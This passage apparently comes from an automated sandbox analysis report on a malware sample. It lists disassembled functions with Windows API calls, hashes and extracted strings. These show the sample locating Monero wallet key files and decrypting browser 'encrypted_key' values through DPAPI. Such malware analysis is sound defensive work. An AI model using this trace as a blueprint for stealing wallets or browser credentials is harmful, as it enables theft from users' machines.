                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: b1ba331eeb80fa7e9c3371897d19b1b938bd797fd047190af4f693b7c8cf8d8c
                            • Instruction ID: b29cd70519317dd5a8362c6510fdeca4f5c084dfbc4437147a75855a2431e585
                            • Opcode Fuzzy Hash: b1ba331eeb80fa7e9c3371897d19b1b938bd797fd047190af4f693b7c8cf8d8c
                            • Instruction Fuzzy Hash: DD911D7291010C9BCB18EBA0DE96FEE7378AF54304F54517DF516B2091EF366A0ACB62
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBD801
                            • lstrlen.KERNEL32(00000000), ref: 00EBD99F
                            • lstrlen.KERNEL32(00000000), ref: 00EBD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 00EBDA32
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 20b91a355335323de837805b182a09dd93ca7d39883b69d326be12743b7b3209
                            • Instruction ID: 13473c18e085983a600cecc354fdbccc8daaf9703cb02b07e238b428c489098e
                            • Opcode Fuzzy Hash: 20b91a355335323de837805b182a09dd93ca7d39883b69d326be12743b7b3209
                            • Instruction Fuzzy Hash: F681FE7291010C9BCB18FBA4DE96FEE7378AF54304F54513DF416B6091EE366A0ACB62
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00ED1580,00ED0D92), ref: 00EBF54C
                            • lstrlen.KERNEL32(00000000), ref: 00EBF56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 19e601fcfdef60b3ac1f9f2a9f6a3d6ade9c428eca4e7b61c825b2d7c69865d7
                            • Instruction ID: df3aae8769e6717156f3c8712383bd994a18d22b8a443a5b91ca856977165883
                            • Opcode Fuzzy Hash: 19e601fcfdef60b3ac1f9f2a9f6a3d6ade9c428eca4e7b61c825b2d7c69865d7
                            • Instruction Fuzzy Hash: 0B510372D0010CABDB18FBA0ED56EED73B8AF54304F44953DF41676191EE355A0ACBA1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s$s$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-3520659465
                            • Opcode ID: 61f9a6a32a3b74d9ac91cc72bfdb482881d0dc8de68183da179d6f2292b2976d
                            • Instruction ID: c55b79a8f14397d86a2f84bed201ae81871d89596b8d5fe725cc811fe794c377
                            • Opcode Fuzzy Hash: 61f9a6a32a3b74d9ac91cc72bfdb482881d0dc8de68183da179d6f2292b2976d
                            • Instruction Fuzzy Hash: 6E51BFB0C042089BDB24EB90DE85FEEB3B4AF04304F1460ACE25577281EB752E8ACF54
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 343d18089b6264ce9cf40459a123e37676bd5708ed49f355b06277ec22caea28
                            • Instruction ID: 5b007e817de700df507b8acca1afccd4d9eb2aa3f5e8cc7fe5a84adba099b2b1
                            • Opcode Fuzzy Hash: 343d18089b6264ce9cf40459a123e37676bd5708ed49f355b06277ec22caea28
                            • Instruction Fuzzy Hash: C8411E71D10209ABCB04EFB5DA45FFEB7B4AB44708F14A02DE41676290DB769A06CFA1
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EB9D39
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9AEF
                              • Part of subcall function 00EB9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B01
                              • Part of subcall function 00EB9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EB9B2A
                              • Part of subcall function 00EB9AC0: LocalFree.KERNEL32(?,?,?,?,00EB4EEE,00000000,?), ref: 00EB9B3F
                              • Part of subcall function 00EB9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EB9B84
                              • Part of subcall function 00EB9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EB9BA3
                              • Part of subcall function 00EB9B60: LocalFree.KERNEL32(?), ref: 00EB9BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 99465dc45be4e04798fde74b7e5b3ce049e804e4631a00fedf7eaf606fe86781
                            • Instruction ID: 5468274f642a6996f031b3201410887dc418935a6a7ba2ab91653c9e59087428
                            • Opcode Fuzzy Hash: 99465dc45be4e04798fde74b7e5b3ce049e804e4631a00fedf7eaf606fe86781
                            • Instruction Fuzzy Hash: A7315EB6D10209ABCF04DBE4DD85EEFB7B8BB48304F145519EA05B7242EB319A05CBA1
                            APIs
                            • __getptd.LIBCMT ref: 00ECC74E
                              • Part of subcall function 00ECBF9F: __amsg_exit.LIBCMT ref: 00ECBFAF
                            • __getptd.LIBCMT ref: 00ECC765
                            • __amsg_exit.LIBCMT ref: 00ECC773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00ECC797
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: b6351704e5c68927a3f0c5a1451de9343ab1133239ec16d11d4a41358f6f434b
                            • Instruction ID: 5c026952bab839f5e9dd013f0d8615265bdbdd384593b1cf58072a3234462aeb
                            • Opcode Fuzzy Hash: b6351704e5c68927a3f0c5a1451de9343ab1133239ec16d11d4a41358f6f434b
                            • Instruction Fuzzy Hash: 63F06D32A053049BDB21BBB85A07F5E33E0AF00724F25614EF418B62D2DB6659439E56
                            APIs
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC4F7A
                            • lstrcat.KERNEL32(?,00ED1070), ref: 00EC4F97
                            • lstrcat.KERNEL32(?,00A98808), ref: 00EC4FAB
                            • lstrcat.KERNEL32(?,00ED1074), ref: 00EC4FBD
                              • Part of subcall function 00EC4910: wsprintfA.USER32 ref: 00EC492C
                              • Part of subcall function 00EC4910: FindFirstFileA.KERNEL32(?,?), ref: 00EC4943
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FDC), ref: 00EC4971
                              • Part of subcall function 00EC4910: StrCmpCA.SHLWAPI(?,00ED0FE0), ref: 00EC4987
                              • Part of subcall function 00EC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00EC4B7D
                              • Part of subcall function 00EC4910: FindClose.KERNEL32(000000FF), ref: 00EC4B92
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                             • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 7163109b1635a98c69ae2f56feafbf7652e5e9011ea5f9c5a14e0fa58a80b49a
                            • Instruction ID: 4361c7675892c13b2ae5d96479205c0529b918bac6c193e06bda2776263f6de8
                            • Opcode Fuzzy Hash: 7163109b1635a98c69ae2f56feafbf7652e5e9011ea5f9c5a14e0fa58a80b49a
                            • Instruction Fuzzy Hash: 4621FD76A00208A7C764F770DD47FE9337CA794700F00459CB68DA7585DE7696CACBA1